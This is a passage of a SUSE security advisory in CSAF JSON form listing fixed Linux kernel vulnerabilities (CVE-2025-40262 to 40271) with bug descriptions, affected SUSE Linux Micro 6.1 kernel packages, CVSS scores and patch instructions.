},
{
"cve": "CVE-2025-40262",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40262"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: imx_sc_key - fix memory corruption on unload\n\nThis is supposed to be \"priv\" but we accidentally pass \"\u0026priv\" which is\nan address in the stack and so it will lead to memory corruption when\nthe imx_sc_key_action() function is called. Remove the \u0026.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40262",
"url": "https://www.suse.com/security/cve/CVE-2025-40262"
},
{
"category": "external",
"summary": "SUSE Bug 1254840 for CVE-2025-40262",
"url": "https://bugzilla.suse.com/1254840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40262"
},
{
"cve": "CVE-2025-40263",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40263"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: cros_ec_keyb - fix an invalid memory access\n\nIf cros_ec_keyb_register_matrix() isn\u0027t called (due to\n`buttons_switches_only`) in cros_ec_keyb_probe(), `ckdev-\u003eidev` remains\nNULL. An invalid memory access is observed in cros_ec_keyb_process()\nwhen receiving an EC_MKBP_EVENT_KEY_MATRIX event in cros_ec_keyb_work()\nin such case.\n\n Unable to handle kernel read from unreadable memory at virtual address 0000000000000028\n ...\n x3 : 0000000000000000 x2 : 0000000000000000\n x1 : 0000000000000000 x0 : 0000000000000000\n Call trace:\n input_event\n cros_ec_keyb_work\n blocking_notifier_call_chain\n ec_irq_thread\n\nIt\u0027s still unknown about why the kernel receives such malformed event,\nin any cases, the kernel shouldn\u0027t access `ckdev-\u003eidev` and friends if\nthe driver doesn\u0027t intend to initialize them.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40263",
"url": "https://www.suse.com/security/cve/CVE-2025-40263"
},
{
"category": "external",
"summary": "SUSE Bug 1255077 for CVE-2025-40263",
"url": "https://bugzilla.suse.com/1255077"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40263"
},
{
"cve": "CVE-2025-40264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40264"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbe2net: pass wrb_params in case of OS2BMC\n\nbe_insert_vlan_in_pkt() is called with the wrb_params argument being NULL\nat be_send_pkt_to_bmc() call site. This may lead to dereferencing a NULL\npointer when processing a workaround for specific packet, as commit\nbc0c3405abbb (\"be2net: fix a Tx stall bug caused by a specific ipv6\npacket\") states.\n\nThe correct way would be to pass the wrb_params from be_xmit().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40264",
"url": "https://www.suse.com/security/cve/CVE-2025-40264"
},
{
"category": "external",
"summary": "SUSE Bug 1254835 for CVE-2025-40264",
"url": "https://bugzilla.suse.com/1254835"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40264"
},
{
"cve": "CVE-2025-40268",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40268"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: client: fix memory leak in smb3_fs_context_parse_param\n\nThe user calls fsconfig twice, but when the program exits, free() only\nfrees ctx-\u003esource for the second fsconfig, not the first.\nRegarding fc-\u003esource, there is no code in the fs context related to its\nmemory reclamation.\n\nTo fix this memory leak, release the source memory corresponding to ctx\nor fc before each parsing.\n\nsyzbot reported:\nBUG: memory leak\nunreferenced object 0xffff888128afa360 (size 96):\n backtrace (crc 79c9c7ba):\n kstrdup+0x3c/0x80 mm/util.c:84\n smb3_fs_context_parse_param+0x229b/0x36c0 fs/smb/client/fs_context.c:1444\n\nBUG: memory leak\nunreferenced object 0xffff888112c7d900 (size 96):\n backtrace (crc 79c9c7ba):\n smb3_fs_context_fullpath+0x70/0x1b0 fs/smb/client/fs_context.c:629\n smb3_fs_context_parse_param+0x2266/0x36c0 fs/smb/client/fs_context.c:1438",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40268",
"url": "https://www.suse.com/security/cve/CVE-2025-40268"
},
{
"category": "external",
"summary": "SUSE Bug 1255082 for CVE-2025-40268",
"url": "https://bugzilla.suse.com/1255082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40268"
},
{
"cve": "CVE-2025-40269",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40269"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix potential overflow of PCM transfer buffer\n\nThe PCM stream data in USB-audio driver is transferred over USB URB\npacket buffers, and each packet size is determined dynamically. The\npacket sizes are limited by some factors such as wMaxPacketSize USB\ndescriptor. OTOH, in the current code, the actually used packet sizes\nare determined only by the rate and the PPS, which may be bigger than\nthe size limit above. This results in a buffer overflow, as reported\nby syzbot.\n\nBasically when the limit is smaller than the calculated packet size,\nit implies that something is wrong, most likely a weird USB\ndescriptor. So the best option would be just to return an error at\nthe parameter setup time before doing any further operations.\n\nThis patch introduces such a sanity check, and returns -EINVAL when\nthe packet size is greater than maxpacksize. The comparison with\nep-\u003epacksize[1] alone should suffice since it\u0027s always equal or\ngreater than ep-\u003epacksize[0].",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40269",
"url": "https://www.suse.com/security/cve/CVE-2025-40269"
},
{
"category": "external",
"summary": "SUSE Bug 1255035 for CVE-2025-40269",
"url": "https://bugzilla.suse.com/1255035"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40269"
},
{
"cve": "CVE-2025-40271",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40271"
}
],
"notes": [
{
"category": "general",
